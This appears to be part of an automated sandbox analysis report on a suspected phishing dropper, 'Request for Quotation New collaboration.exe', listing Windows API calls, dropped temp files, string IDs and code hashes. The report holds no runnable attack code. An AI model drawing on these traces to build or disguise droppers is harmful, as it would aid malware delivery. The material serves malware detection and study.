                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                  • String ID: CB@$Call$N$open
                                                                                                                                  • API String ID: 3615053054-4184941720
                                                                                                                                  • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                  • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                                  • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                  • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                                  APIs
                                                                                                                                  • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                    • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                    • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                                  • wsprintfA.USER32 ref: 00405C80
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                    • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Request for Quotation New collaboration.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                    • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                  • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                  • API String ID: 1265525490-3322868524
                                                                                                                                  • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                  • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                  • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                  • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                  • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                  • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                  • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                  • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                  • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                  APIs
                                                                                                                                  • wsprintfW.USER32 ref: 100024E1
                                                                                                                                  • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                                                    • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,76F8FFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                                                  • String ID: s<u
                                                                                                                                  • API String ID: 2435812281-779365171
                                                                                                                                  • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                  • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                                                  • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                                  • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061E1
                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061F5
                                                                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00406208
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040617F, 00406184
                                                                                                                                  • "C:\Users\user\Desktop\Request for Quotation New collaboration.exe", xrefs: 004061C2
                                                                                                                                  • *?|<>/":, xrefs: 004061D0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 589700163-4215291827
                                                                                                                                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                  • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                  • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nso7880.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nso7880.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                  • String ID: 8$C:\Users\user\AppData\Local\Temp\nso7880.tmp$C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dll
                                                                                                                                  • API String ID: 1453599865-3498465927
                                                                                                                                  • Opcode ID: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                                                  • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                  • Opcode Fuzzy Hash: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                                                  • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                  • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                  • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                  • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3294113728-0
                                                                                                                                  • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                  • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                  • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                  • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                  • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                  • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                                  • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                  • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                                  • wsprintfW.USER32 ref: 00402D81
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                    • Part of subcall function 00402CFE: MulDiv.KERNEL32(0001E48B,00000064,00025527), ref: 00402D13
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                  • String ID: ... %d%%
                                                                                                                                  • API String ID: 722711167-2449383134
                                                                                                                                  • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                  • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
